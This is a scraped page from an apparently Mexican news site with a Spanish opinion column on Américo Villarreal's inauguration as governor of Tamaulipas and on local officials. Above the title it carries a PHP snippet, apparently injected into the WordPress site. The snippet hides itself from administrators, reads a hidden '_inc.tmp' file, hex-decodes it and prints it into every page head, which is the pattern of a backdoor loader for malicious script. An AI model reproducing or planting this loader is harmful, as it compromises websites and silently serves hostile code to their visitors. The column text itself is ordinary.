if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Estaba cañón – Reporte Noreste
Conéctate con nosotros

Opinión

Estaba cañón

Estaba cañón

Cuando el Trinunal Electoral del Poder Judicial de la Federación (TEPJF), recargó su “confianza” al proyecto político de Morena en la persona de Américo Villarreal Anaya sin importar nada de lo que hubiera sucedido durante el proceso electoral comenzó un nuevo ciclo, la campaña quedaba desinflada por completo, o bueno, así parecía.

Después el histórico primero de octubre, día en el que Tamaulipas se vanagloriaba ondeando la bandera de una segunda alternancia; la primera la escribió Francisco Javier García Cabeza de Vaca tras desbancar al PRI, y ahora Américo dejando herido al ex gobernador panista… lo más importante desde entonces es y serán los resultados de los nuevos gobernantes.

Entonces para el sábado en el cambio de poderes, lo menos trascendente era que estuviera o no Cabeza de Vaca, lo realmente relevante iba a ser el andar del nuevo gobernador y los nombramientos, la elección de las personas que lo acompañarán como secretarios para seguir en la ruta del bienestar.

Desafortunadamente muchos que andan merodeando al gobernador creen que siguen en campaña, tan ignorantes de que su grupo político llegó al poder que siguen preocupados por Francisco Javier García Cabeza de Vaca, el mismo Santiago Nieto declarando al respecto, cuando la notica es la llegada de Américo, para nada, la ausencia de Francisco que al fin de cuentas a partir de las 00 horas del uno de octubre fue, es decir, ya Américo se convertía en gobernador, la rendición de protesta, el evento en el Recinto Ferial, es el protocolo, el circo, la maroma que envenena a los políticos por igual.

A trababar, ellos dicen son 4T, yo los veo como los priístas que se fueron y regresaron, porque devolver, ni el más ingenuo como este que escribe.

Enhorabuena Tamaulipas.

Por cierto, el presidente de México sí que tiene interés de engordar la historia política de Cabeza de Vaca, el ex gobernador ya terminó y este lunesen la mañanera el jefe del ejecutivo federal admitió que en Tamaulipas estaba “cañón”.

En la intimidad… El que sorprende cada día es Gabriel Guerra Turrubiates; la gente lo recuerda cercano al exalcalde maderense  Guadalupe González Galván, claro, también allegado al ahora diputado federal pero nadie comenta nada más negativo a eso de “El Cowboy” de la COMAPA, será porque hizo del slogan 24/7 su forma de vivir; tal vez mañana le salgan los detractores y esa sería su nueva victoria, porque en poco tiempo demostró que le sobran ganas de trabajar por la gente del sur de Tamaulipas sin importar los colores partidistas.

Un cargo público es para hacer el bien, debe verse como una distinción de vida; que siga así.

davidcastellanost@hotmail.com
@dect1608

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Opinión